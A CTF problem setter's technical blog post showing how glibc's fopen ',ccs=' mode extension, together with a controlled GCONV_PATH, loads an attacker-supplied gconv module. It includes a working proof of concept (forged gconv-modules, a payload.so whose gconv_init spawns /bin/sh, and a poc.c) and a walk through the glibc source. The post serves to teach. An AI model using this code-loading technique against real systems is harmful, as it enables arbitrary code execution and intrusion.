Getting Arbitrary Code Execution from fopen's 2nd Argument

Published:

Introduction

Recently I was in charge of setting problems for the CODE BLUE CTF 2019 Finals.
One of my problems, Wire Hetimarl, was “weird” in the sense that you had to keep an eye on the 2nd argument of fopen (that is, a mode such as rb) to reach the perfect solution.
How can that argument, which seems almost always useless for exploitation, become a trigger point?
Let me show you an example.

First, let’s put the following two files under /home/user:

gconv-modules
module  PAYLOAD//   INTERNAL    ../../../../../../../../home/user/payload   2
module  INTERNAL    PAYLOAD//   ../../../../../../../../home/user/payload   2

payload.c
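#include <stdio.h>
#include <stdlib.h>

/* glibc refuses a module that does not export "gconv", so provide a stub. */
void gconv() {}

/* Looked up by glibc when the module is loaded; this is where we take over. */
void gconv_init() {
  puts("pwned");
  system("/bin/sh");
  exit(0);
}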

Compile payload.c with gcc payload.c -o payload.so -shared -fPIC.

Then, put the following code in the same directory:

poc.c
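#include <stdio.h>
#include <stdlib.h>

int main(void) {
  /* Point glibc's charset conversion configuration at the current directory. */
  putenv("GCONV_PATH=.");
  /* The name after ",ccs=" selects the PAYLOAD entries in gconv-modules. */
  FILE *fp = fopen("some_random_file", "w,ccs=payload");
}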

Compile and run it. Then…

user:/home/user$ gcc poc.c -o poc
user:/home/user$ ./poc
pwned
$

A shell pops out!

What happened?

As you may have noticed, GCONV_PATH and ,ccs=payload are to blame for this incident.
What are they in the first place?
I guess most of you have never seen them before.

According to the man page, glibc’s fopen has several extended features:

Glibc notes
    The GNU C library allows the following extensions for the string
    specified in mode:

    c (since glibc 2.3.3)
        Do not make the open operation, or subsequent read and write
        operations, thread cancellation points. This flag is ignored
        for fdopen().

    e (since glibc 2.7)
        Open the file with the O_CLOEXEC flag. See open(2) for more
        information. This flag is ignored for fdopen().

    m (since glibc 2.3)
        Attempt to access the file using mmap(2), rather than I/O
        system calls (read(2), write(2)). Currently, use of mmap(2)
        is attempted only for a file opened for reading.

    x   Open the file exclusively (like the O_EXCL flag of open(2)).
        If the file already exists, fopen() fails, and sets errno to
        EEXIST. This flag is ignored for fdopen().

    In addition to the above characters, fopen() and freopen() support
    the following syntax in mode:

        ,ccs=string

    The given string is taken as the name of a coded character set and
    the stream is marked as wide-oriented. Thereafter, internal
    conversion functions convert I/O to and from the character set
    string. If the ,ccs=string syntax is not specified, then the wide-
    orientation of the stream is determined by the first file operation.
    If that operation is a wide-character operation, the stream is marked
    wide-oriented, and functions to convert to the coded character set
    are loaded.

Uh-huh? So all I did with ,ccs=payload was specify the coded character set for the file.
But how did that go so far as to pop a shell?
This time I’m gonna quote glibc’s source code:

libio/fileops.c
FILE *
_IO_new_file_fopen (FILE *fp, const char *filename, const char *mode,
                    int is32not64)
{
  int oflags = 0, omode;
  int read_write;
  int oprot = 0666;
  int i;
  FILE *result;
  const char *cs;
  const char *last_recognized;

  ...

  result = _IO_file_open (fp, filename, omode|oflags, oprot, read_write,
                          is32not64);

  if (result != NULL)
    {
      /* Test whether the mode string specifies the conversion. */
      cs = strstr (last_recognized + 1, ",ccs=");
      if (cs != NULL)
        {
          /* Yep. Load the appropriate conversions and set the orientation
             to wide. */
          struct gconv_fcts fcts;
          struct _IO_codecvt *cc;
          char *endp = __strchrnul (cs + 5, ',');
          char *ccs = malloc (endp - (cs + 5) + 3);

          if (ccs == NULL)
            {
              int malloc_err = errno; /* Whatever malloc failed with. */
              (void) _IO_file_close_it (fp);
              __set_errno (malloc_err);
              return NULL;
            }

          *((char *) __mempcpy (ccs, cs + 5, endp - (cs + 5))) = '\0';
          strip (ccs, ccs);

          if (__wcsmbs_named_conv (&fcts, ccs[2] == '\0'
                                   ? upstr (ccs, cs + 5) : ccs) != 0)
            {
              /* Something went wrong, we cannot load the conversion modules.
                 This means we cannot proceed since the user explicitly asked
                 for these. */
              (void) _IO_file_close_it (fp);
              free (ccs);
              __set_errno (EINVAL);
              return NULL;
            }

It seems __wcsmbs_named_conv plays a role.

wcsmbs/wcsmbsload.c
/* Get converters for named charset.  */
int
__wcsmbs_named_conv (struct gconv_fcts *copy, const char *name)
{
  copy->towc = __wcsmbs_getfct ("INTERNAL", name, &copy->towc_nsteps);
  if (copy->towc == NULL)
    return 1;

  copy->tomb = __wcsmbs_getfct (name, "INTERNAL", &copy->tomb_nsteps);
  if (copy->tomb == NULL)
    {
      __gconv_close_transform (copy->towc, copy->towc_nsteps);
      return 1;
    }

  return 0;
}

attribute_hidden
struct __gconv_step *
__wcsmbs_getfct (const char *to, const char *from, size_t *nstepsp)
{
  size_t nsteps;
  struct __gconv_step *result;

  if (__gconv_find_transform (to, from, &result, &nsteps, 0) != __GCONV_OK)
    /* Loading the conversion step is not possible. */
    return NULL;

  /* Maybe it is someday necessary to allow more than one step.
     Currently this is not the case since the conversions handled here
     are from and to INTERNAL and there always is a converted for
     that. It the directly following code is enabled the libio
     functions will have to allocate appropriate __gconv_step_data
     elements instead of only one. */
  if (nsteps > 1)
    {
      /* We cannot handle this case. */
      __gconv_close_transform (result, nsteps);
      result = NULL;
    }
  else
    *nstepsp = nsteps;

  return result;
}

iconv/gconv_db.c
int
__gconv_find_transform (const char *toset, const char *fromset,
                        struct __gconv_step **handle, size_t *nsteps,
                        int flags)
{
  const char *fromset_expand;
  const char *toset_expand;
  int result;

  /* Ensure that the configuration data is read. */
  __gconv_load_conf ();

  ...

  /* See whether the names are aliases. */
  fromset_expand = do_lookup_alias (fromset);
  toset_expand = do_lookup_alias (toset);

  ...

  result = find_derivation (toset, toset_expand, fromset, fromset_expand,
                            handle, nsteps);

  /* Release the lock. */
  __libc_lock_unlock (__gconv_lock);

  /* The following code is necessary since `find_derivation' will return
     GCONV_OK even when no derivation was found but the same request
     was processed before. I.e., negative results will also be cached. */
  return (result == __GCONV_OK
          ? (*handle == NULL ? __GCONV_NOCONV : __GCONV_OK)
          : result);
}

/* The main function: find a possible derivation from the `fromset' (either
   the given name or the alias) to the `toset' (again with alias). */
static int
find_derivation (const char *toset, const char *toset_expand,
                 const char *fromset, const char *fromset_expand,
                 struct __gconv_step **handle, size_t *nsteps)
{
  struct derivation_step *first, *current, **lastp, *solution = NULL;
  int best_cost_hi = INT_MAX;
  int best_cost_lo = INT_MAX;
  int result;

  ...

  /* The task is to find a sequence of transformations, backed by the
     existing modules - whether builtin or dynamically loadable -,
     starting at `fromset' (or `fromset_expand') and ending at `toset'
     (or `toset_expand'), and with minimal cost.

     For computer scientists, this is a shortest path search in the
     graph where the nodes are all possible charsets and the edges are
     the transformations listed in __gconv_modules_db.

     For now we use a simple algorithm with quadratic runtime behaviour.
     A breadth-first search, starting at `fromset' and `fromset_expand'.
     The list starting at `first' contains all nodes that have been
     visited up to now, in the order in which they have been visited --
     excluding the goal nodes `toset' and `toset_expand' which get
     managed in the list starting at `solution'.
     `current' walks through the list starting at `first' and looks
     which nodes are reachable from the current node, adding them to
     the end of the list [`first' or `solution' respectively] (if
     they are visited the first time) or updating them in place (if
     they have have already been visited).
     In each node of either list, cost_lo and cost_hi contain the
     minimum cost over any paths found up to now, starting at `fromset'
     or `fromset_expand', ending at that node. best_cost_lo and
     best_cost_hi represent the minimum over the elements of the
     `solution' list. */
  ...

Did you grasp the situation? When we name a coded character set, glibc looks for a way to convert between that set and the one it uses internally (INTERNAL), searching through the known conversion modules for the cheapest route. Sometimes it actually runs a breadth-first search to find that route, which is pretty interesting.

In a nutshell, GCONV_PATH is an environment variable for changing the configuration of this translation mechanism:

iconv/gconv_conf.c
static void
__gconv_read_conf (void)
{
  void *modules = NULL;
  size_t nmodules = 0;
  int save_errno = errno;
  size_t cnt;

  /* First see whether we should use the cache. */
  if (__gconv_load_cache () == 0)
    {
      /* Yes, we are done. */
      __set_errno (save_errno);
      return;
    }
  ...

iconv/gconv_cache.c
int
__gconv_load_cache (void)
{
  int fd;
  struct stat64 st;
  struct gconvcache_header *header;

  /* We cannot use the cache if the GCONV_PATH environment variable is
     set. */
  __gconv_path_envvar = getenv ("GCONV_PATH");
  if (__gconv_path_envvar != NULL)
    return -1;
  ...

That means that if we can set GCONV_PATH to an arbitrary value, glibc skips the cache and we can supply our own configuration, forging an arbitrary route for converting between coded character sets.
But why does this matter? To answer that, we need to look deeper into find_derivation.

iconv/gconv_db.c
/* The main function: find a possible derivation from the `fromset' (either
   the given name or the alias) to the `toset' (again with alias). */
static int
find_derivation (const char *toset, const char *toset_expand,
                 const char *fromset, const char *fromset_expand,
                 struct __gconv_step **handle, size_t *nsteps)
{
  ...

  if (solution != NULL)
    {
      /* We really found a way to do the transformation. */

      /* Choose the best solution. This is easy because we know that
         the solution list has at most length 2 (one for every possible
         goal node). */
      if (solution->next != NULL)
        {
          struct derivation_step *solution2 = solution->next;

          if (solution2->cost_hi < solution->cost_hi
              || (solution2->cost_hi == solution->cost_hi
                  && solution2->cost_lo < solution->cost_lo))
            solution = solution2;
        }

      /* Now build a data structure describing the transformation steps. */
      result = gen_steps (solution, toset_expand ?: toset,
                          fromset_expand ?: fromset, handle, nsteps);
    }
  ...

static int
gen_steps (struct derivation_step *best, const char *toset,
           const char *fromset, struct __gconv_step **handle, size_t *nsteps)
{
  ...
#ifndef STATIC_GCONV
          if (current->code->module_name[0] == '/')
            {
              /* Load the module, return handle for it. */
              struct __gconv_loaded_object *shlib_handle =
                __gconv_find_shlib (current->code->module_name);

              if (shlib_handle == NULL)
                {
                  failed = 1;
                  break;
                }
              ...

iconv/gconv_dl.c
/* Open the gconv database if necessary. A non-negative return value
   means success. */
struct __gconv_loaded_object *
__gconv_find_shlib (const char *name)
{
  ...
  /* Try to load the shared object if the usage count is 0. This
     implies that if the shared object is not loadable, the handle is
     NULL and the usage count > 0. */
  if (found != NULL)
    {
      if (found->counter < -TRIES_BEFORE_UNLOAD)
        {
          assert (found->handle == NULL);
          found->handle = __libc_dlopen (found->name);
          if (found->handle != NULL)
            {
              found->fct = __libc_dlsym (found->handle, "gconv");
              if (found->fct == NULL)
                {
                  /* Argh, no conversion function. There is something
                     wrong here. */
                  __gconv_release_shlib (found);
                  found = NULL;
                }
              else
                {
                  found->init_fct = __libc_dlsym (found->handle, "gconv_init");
                  found->end_fct = __libc_dlsym (found->handle, "gconv_end");
                  ...

Oh, there we can see __libc_dlopen and __libc_dlsym!
So we have finally figured out that glibc relies on dynamically loaded libraries to implement encoding conversion, and my PoC took advantage of this mechanism: the forged gconv-modules entry points at payload.so, glibc loads it, and gconv_init runs.

Is this dangerous?

Not really, I guess. There are two reasons:

  1. There is virtually no situation where an attacker can control the 2nd argument of fopen. It is almost always a constant.

  2. GCONV_PATH is treated as a “dangerous” environment variable, like LD_PRELOAD. In fact, glibc drops it for setuid binaries (see sysdeps/generic/unsecvars.h).

Nevertheless, it may be possible to abuse this mechanism in operations that use iconv rather than fopen. I don’t know.
I set this problem simply because it was interesting.
Thanks.